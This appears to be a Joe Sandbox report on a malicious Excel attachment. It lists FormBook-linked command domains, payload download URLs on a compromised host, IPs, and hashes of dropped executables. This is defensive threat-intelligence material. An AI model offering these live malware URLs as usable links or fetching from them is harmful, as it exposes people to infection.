                http://www.centralngs.com/ge06/www.west-paws.comexplorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://www.piriform.com/ccleanerxeexplorer.exe, 00000008.00000002.849943461.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.413067200.000000000260E000.00000004.00000001.00020000.00000000.sdmpfalse
                  		high
                  http://www.centralngs.comReferer:explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.credit-cards-16215.bondReferer:explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.hndswicco.best/ge06/explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.west-paws.comReferer:explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.versebuild.xyzReferer:explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.bowllywood.com/ge06/explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.daqtpt.cfdReferer:explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.pj69vip12.cyou/ge06/explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.moderco.net/ge06/explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.ecoboat.world/ge06/explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.ecoboat.worldReferer:explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.bulgarianarchive.com/ge06/explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.centralngs.com/ge06/explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://nsis.sf.net/NSIS_ErrorErrorword.exe, 00000005.00000000.409599934.0000000000409000.00000008.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp, word.exe.2.dr, jakatrol2.1[1].exe.2.drfalse
                    		high
                    http://www.sxchenggu.comReferer:explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.credit-cards-16215.bond/ge06/www.versebuild.xyzexplorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.ecoboat.world/ge06/www.bulgarianarchive.comexplorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://www.sedo.com/services/parking.php3chkdsk.exe, 0000000A.00000002.850024421.00000000029EF000.00000004.10000000.00040000.00000000.sdmpfalse
                      		high
                      http://java.sun.comexplorer.exe, 00000008.00000000.412690106.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.849552627.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://nsis.sf.net/NSIS_Errorword.exe, word.exe, 00000005.00000000.409599934.0000000000409000.00000008.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp, word.exe.2.dr, jakatrol2.1[1].exe.2.drfalse
                        		high
                        http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000008.00000000.413347575.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.849943461.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.413067200.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.413884279.00000000074B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.850716518.00000000074B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.413347575.0000000003E9C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.850269711.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.413884279.0000000007517000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.850269711.0000000003E9C000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          http://www.hndswicco.bestReferer:explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.bowllywood.comexplorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.moderco.netReferer:explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.narrativepages.comReferer:explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.pj69vip12.cyouReferer:explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.miamirealestatecommercial.com/ge06/explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.moderco.net/ge06/www.daqtpt.cfdexplorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.narrativepages.com/ge06/www.credit-cards-16215.bondexplorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.versebuild.xyzexplorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://img.sedoparking.com/templates/images/hero_nc.svgexplorer.exe, 00000008.00000002.851097210.0000000008BFF000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.850024421.00000000029EF000.00000004.10000000.00040000.00000000.sdmpfalse
                            		high
                            http://www.piriform.com/ccleanerexplorer.exe, 00000008.00000000.413347575.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.849943461.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.413067200.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.413884279.00000000074B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.850716518.00000000074B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.413347575.0000000003E9C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.850269711.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.413884279.0000000007517000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.850269711.0000000003E9C000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              http://www.daqtpt.cfd/ge06/www.ecoboat.worldexplorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              https://support.mozilla.orgexplorer.exe, 00000008.00000000.412690106.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.849552627.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://www.hndswicco.best/ge06/www.fakeittilyoumakeitfinance.comexplorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.ecoboat.worldexplorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: phishing
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                41.185.64.155
                                		mail.treeoflifeadventures.comSouth Africa
                                		36943GridhostZAtrue
                                103.224.212.212
                                		www.narrativepages.comAustralia
                                		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                206.188.193.211
                                		www.miamirealestatecommercial.comUnited States
                                		55002DEFENSE-NETUStrue
                                38.11.36.68
                                		www.sxchenggu.comUnited States
                                		174COGENT-174UStrue
                                34.149.87.45
                                		td-ccm-neg-87-45.wixdns.netUnited States
                                		2686ATGS-MMD-ASUStrue
                                91.195.240.19
                                		parkingpage.namecheap.comGermany
                                		47846SEDO-ASDEfalse
                                3.33.130.190
                                		centralngs.comUnited States
                                		8987AMAZONEXPANSIONGBtrue

                                General Information

                                Joe Sandbox Version:38.0.0 Ammolite
                                Analysis ID:1342301
                                Start date and time:2023-11-14 13:25:07 +01:00
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 10m 20s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                Number of analysed new started processes analysed:13
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:1
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample file name:RFQ-T56797W_1.xlsx
                                Detection:MAL
                                Classification:mal100.troj.expl.evad.winXLSX@14/7@9/7
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 152
                                • Number of non-executed functions: 151
                                Cookbook Comments:
                                • Found application associated with file extension: .xlsx
                                • Found Word or Excel or PowerPoint or XPS Viewer
                                • Attach to Office via COM
                                • Active ActiveX Object
                                • Scroll down
                                • Close Viewer
                                • Override analysis time to 67923.0899862697 for current running targets taking high CPU consumption
                                • Override analysis time to 135846.179972539 for current running targets taking high CPU consumption

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                • Excluded IPs from analysis (whitelisted): 72.21.81.240
                                • Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtEnumerateKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                13:26:20API Interceptor114x Sleep call for process: EQNEDT32.EXE modified
                                13:26:26API Interceptor29x Sleep call for process: oktuxvhtsq.exe modified
                                13:26:31API Interceptor9268320x Sleep call for process: chkdsk.exe modified
                                13:26:33API Interceptor5127x Sleep call for process: explorer.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                41.185.64.155RFQ-T56797W.xlsxGet hashmaliciousFormBook, NSISDropperBrowse
                                • mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/kongaby2.1.exe
                                New_order_98987006305#.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/jucostam2.1.exe
                                New_order_98987006305#.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/jujoptics2.1.exe
                                TN81804BM.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/strakonaj2.1.exe
                                SecuriteInfo.com.Exploit.CVE-2017-11882.123.27294.9574.rtfGet hashmaliciousUnknownBrowse
                                • mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/lightisted2.1.exe
                                New_order_98987006305#.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/jujukhanis2.1.exe
                                63611-RFQ.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/marikolock2.1.exe
                                SecuriteInfo.com.Exploit.CVE-2018-0798.4.4115.17388.rtfGet hashmaliciousAgentTesla, NSISDropperBrowse
                                • mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/maxkujor2.1.exe
                                PO-AM2307586.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/finakolad2.1.exe
                                SecuriteInfo.com.Exploit.CVE-2018-0798.4.4081.11101.rtfGet hashmaliciousFormBook, NSISDropperBrowse
                                • mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/sukonted2.1.exe
                                Order_List.docGet hashmaliciousUnknownBrowse
                                • mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/welterkonzo2.1.exe
                                Purchase_Order_No.1364.docGet hashmaliciousAgentTeslaBrowse
                                • mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/pqAlGyUFhqdKYsx.exe
                                Order_List.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/macwelter2.1.exe
                                Order_No_455100.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/windviewcikon2.1.exe
                                Quotation.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/macbomard2.1.exe
                                New_Request_B300.docGet hashmaliciousUnknownBrowse
                                • mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/alleromac2.1.exe
                                Order_No_455100.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/romankon2.1.exe
                                Order_No_455100.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/marcolite2.1.exe
                                SecuriteInfo.com.Exploit.CVE-2018-0798.4.23494.27107.rtfGet hashmaliciousRemcosBrowse
                                • mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/shekinga2.1.exe
                                SecuriteInfo.com.Exploit.CVE-2018-0798.4.30706.1643.rtfGet hashmaliciousUnknownBrowse
                                • mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/shedremko2.1.exe

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                parkingpage.namecheap.com9i6tQlNW5V.exeGet hashmaliciousFormBookBrowse
                                • 91.195.240.19
                                130_xlsx.exeGet hashmaliciousFormBookBrowse
                                • 91.195.240.19
                                NEW_ORDERS_scan_29012019.exeGet hashmaliciousFormBookBrowse
                                • 91.195.240.19
                                PTDwRpT7xd.exeGet hashmaliciousFormBookBrowse
                                • 91.195.240.19
                                PURCHASE_ORDERPOmt1904069_1.exeGet hashmaliciousFormBookBrowse
                                • 91.195.240.19
                                October'23_Statement_of_Account.exeGet hashmaliciousFormBookBrowse
                                • 91.195.240.19
                                Invoice_&_Banking_details.exeGet hashmaliciousFormBookBrowse
                                • 91.195.240.19
                                Factura_de_proforma_pdf.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                • 91.195.240.19
                                BOK9897863546.exeGet hashmaliciousFormBookBrowse
                                • 91.195.240.19
                                BB879OMOJHH.exeGet hashmaliciousFormBookBrowse
                                • 91.195.240.19
                                Receipt!!_PDF.exeGet hashmaliciousFormBookBrowse
                                • 91.195.240.19
                                Invoice_&_SOA_ready_for_dispatch.exeGet hashmaliciousFormBookBrowse
                                • 91.195.240.19
                                DcVDfpyF4G.exeGet hashmaliciousFormBookBrowse
                                • 91.195.240.19
                                61cQ2AJ5tR.exeGet hashmaliciousFormBookBrowse
                                • 91.195.240.19
                                j7jbTHWTgi.exeGet hashmaliciousFormBookBrowse
                                • 91.195.240.19
                                Swift#invoice6-15+PO7038.exeGet hashmaliciousFormBookBrowse
                                • 91.195.240.19
                                INVOICE#20231025.exeGet hashmaliciousFormBookBrowse
                                • 91.195.240.19
                                Purchase_Order_pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                • 91.195.240.19
                                C65v45yjPwh3N8G.exeGet hashmaliciousFormBookBrowse
                                • 91.195.240.19
                                DHL_Receipt_#9552756186.exeGet hashmaliciousFormBookBrowse
                                • 91.195.240.19
                                mail.treeoflifeadventures.comRFQ-T56797W.xlsxGet hashmaliciousFormBook, NSISDropperBrowse
                                • 41.185.64.155
                                New_order_98987006305#.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • 41.185.64.155
                                New_order_98987006305#.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • 41.185.64.155
                                TN81804BM.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • 41.185.64.155
                                SecuriteInfo.com.Exploit.CVE-2017-11882.123.27294.9574.rtfGet hashmaliciousUnknownBrowse
                                • 41.185.64.155
                                New_order_98987006305#.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • 41.185.64.155
                                63611-RFQ.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • 41.185.64.155
                                SecuriteInfo.com.Exploit.CVE-2018-0798.4.4115.17388.rtfGet hashmaliciousAgentTesla, NSISDropperBrowse
                                • 41.185.64.155
                                PO-AM2307586.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • 41.185.64.155
                                SecuriteInfo.com.Exploit.CVE-2018-0798.4.4081.11101.rtfGet hashmaliciousFormBook, NSISDropperBrowse
                                • 41.185.64.155
                                Order_List.docGet hashmaliciousUnknownBrowse
                                • 41.185.64.155
                                Purchase_Order_No.1364.docGet hashmaliciousAgentTeslaBrowse
                                • 41.185.64.155
                                Order_List.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • 41.185.64.155
                                Order_No_455100.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • 41.185.64.155
                                Quotation.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • 41.185.64.155
                                New_Request_B300.docGet hashmaliciousUnknownBrowse
                                • 41.185.64.155
                                Order_No_455100.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • 41.185.64.155
                                Order_No_455100.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • 41.185.64.155
                                SecuriteInfo.com.Exploit.CVE-2018-0798.4.23494.27107.rtfGet hashmaliciousRemcosBrowse
                                • 41.185.64.155
                                SecuriteInfo.com.Exploit.CVE-2018-0798.4.30706.1643.rtfGet hashmaliciousUnknownBrowse
                                • 41.185.64.155

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                GridhostZARFQ-T56797W.xlsxGet hashmaliciousFormBook, NSISDropperBrowse
                                • 41.185.64.155
                                q15vaZEspF.elfGet hashmaliciousMirai, MoobotBrowse
                                • 41.61.164.245
                                e74Xkt1ot5.elfGet hashmaliciousMirai, MoobotBrowse
                                • 41.61.153.7
                                GlBCE6IPE2.elfGet hashmaliciousMirai, MoobotBrowse
                                • 41.185.108.137
                                New_order_98987006305#.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • 41.185.64.155
                                New_order_98987006305#.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • 41.185.64.155
                                TN81804BM.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • 41.185.64.155
                                SecuriteInfo.com.Exploit.CVE-2017-11882.123.27294.9574.rtfGet hashmaliciousUnknownBrowse
                                • 41.185.64.155
                                New_order_98987006305#.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • 41.185.64.155
                                AYSz5iu0AR.elfGet hashmaliciousMiraiBrowse
                                • 41.61.26.229
                                63611-RFQ.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • 41.185.64.155
                                HGi9IZO85i.elfGet hashmaliciousMirai, MoobotBrowse
                                • 41.185.126.148
                                SecuriteInfo.com.Exploit.CVE-2018-0798.4.4115.17388.rtfGet hashmaliciousAgentTesla, NSISDropperBrowse
                                • 41.185.64.155
                                PO-AM2307586.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • 41.185.64.155
                                SecuriteInfo.com.Exploit.CVE-2018-0798.4.4081.11101.rtfGet hashmaliciousFormBook, NSISDropperBrowse
                                • 41.185.64.155
                                https://msds.open.edu/signon/samsoff2.aspx?URL=https%3a%2f%2fbredenkamp.co.za%2f.home%2fauths%2f6Ed2%2flaYhB%2f%2f%2f%2fcHJpdmFjeW9mZmljZXJAcmljLm9yZw==Get hashmaliciousUnknownBrowse
                                • 41.185.8.68
                                https://alcatrazsecurity.co.za/onte/?86550431Get hashmaliciousUnknownBrowse
                                • 41.185.8.145
                                Order_List.docGet hashmaliciousUnknownBrowse
                                • 41.185.64.155
                                Purchase_Order_No.1364.docGet hashmaliciousAgentTeslaBrowse
                                • 41.185.64.155
                                Order_List.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • 41.185.64.155
                                TRELLIAN-AS-APTrellianPtyLimitedAUwM34vVyJ6k.exeGet hashmaliciousFormBookBrowse
                                • 103.224.212.215
                                eKlJmvs8k7.exeGet hashmaliciousFormBookBrowse
                                • 103.224.212.215
                                SecuriteInfo.com.Trojan.NSISX.Spy.Gen.24.14213.13511.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                • 103.224.212.214
                                Quotation.xlsGet hashmaliciousFormBookBrowse
                                • 103.224.212.217
                                015IXAXaPw.exeGet hashmaliciousFormBookBrowse
                                • 103.224.212.215
                                003425425124526.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                • 103.224.212.213
                                Nuevo_orden_pdf.exeGet hashmaliciousFormBookBrowse
                                • 103.224.212.213
                                mj0mo2csOj.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                • 103.224.212.216
                                yKiQrfqhGv.exeGet hashmaliciousFormBookBrowse
                                • 103.224.182.242
                                7Xnc2OFmyt.exeGet hashmaliciousFormBookBrowse
                                • 103.224.212.214
                                0uYM4xUmvi.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                • 103.224.212.214
                                SecuriteInfo.com.FileRepMalware.16340.31219.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                • 103.224.212.216
                                TN81804BM_Production.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • 103.224.212.214
                                https://mafoodallergytraining.org/Get hashmaliciousUnknownBrowse
                                • 103.224.182.218
                                E-dekont.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • 103.224.212.217
                                SecuriteInfo.com.FileRepMalware.2839.30700.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                • 103.224.212.211
                                New_order_98987006305#.docGet hashmaliciousFormBook, NSISDropperBrowse
                                • 103.224.212.211
                                GCeHcfCef8.exeGet hashmaliciousFormBookBrowse
                                • 103.224.212.210
                                PAGO_72094.exeGet hashmaliciousFormBookBrowse
                                • 103.224.212.215
                                Audit_Confirmation_pdf.exeGet hashmaliciousFormBookBrowse
                                • 103.224.212.216

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\jakatrol2.1[1].exe

                                Download File
                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                Category:dropped
                                Size (bytes):400516
                                Entropy (8bit):7.871791543277087
                                Encrypted:false
                                SSDEEP:6144:BBlL/NXMMK36zVS2WGWZu3B8W8ee5ssX8dsuM7AjWe/7mr027RSPII41hnDHjD+p:HfrKqz02XSHscDcP/7mAgSPI5DDD+p
                                MD5:AFFC03992E31B5D4324B41CBD40D911E
                                SHA1:8C3138D444CA823DA937022FE29CB421B243A076
                                SHA-256:6F0AED190A415542A227D4DED6FF390ED8FBC0759B75E5BAEC91BD6C9C3FA752
                                SHA-512:CD5B37C2C0A2CF8594C904084B2C3BDFFC9729B01B79B2135F903F21F502E9C41E8003DCD91DA6D87987DA62EEACC6FB075AE2EC3C901ECF9BE2FDFDF482CA1A
                                Malicious:true
                                Reputation:low
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF.rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@..........................................................................t.......................................................................................p..|............................text....Z.......\.................. ..`.rdata.......p.......`..............@..@.data...8............r..............@....ndata.......P...........................rsrc................x..............@..@................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\2D86.tmp

                                Download File
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:Composite Document File V2 Document, Cannot read section info
                                Category:dropped
                                Size (bytes):1536
                                Entropy (8bit):1.1464700112623651
                                Encrypted:false
                                SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe

                                Download File
                                Process:C:\Users\user\AppData\Roaming\word.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):265216
                                Entropy (8bit):6.485367625505907
                                Encrypted:false
                                SSDEEP:6144:DCa08z788ULY36Y4+n/53FIzK2pAOObTlg:Ww78856WF2pMl
                                MD5:CF92A3EC74E407574A58BCF121BEC4F1
                                SHA1:D117FA6B64E68EA1F24A030153D8BF3F160CB254
                                SHA-256:5165CE18A6AA81AE39B901D1AE017BDF4F4B6B2D984B97D6984C8B4B9FB1F652
                                SHA-512:172171AD3BB7AFC1AF81EC69C42EACBF8D1D3197B8381F392FE650134FDDACBF7DF687E966C36221BD077BE263A24A7173377EDF5A52667178824F050C48E3AB
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                Reputation:low
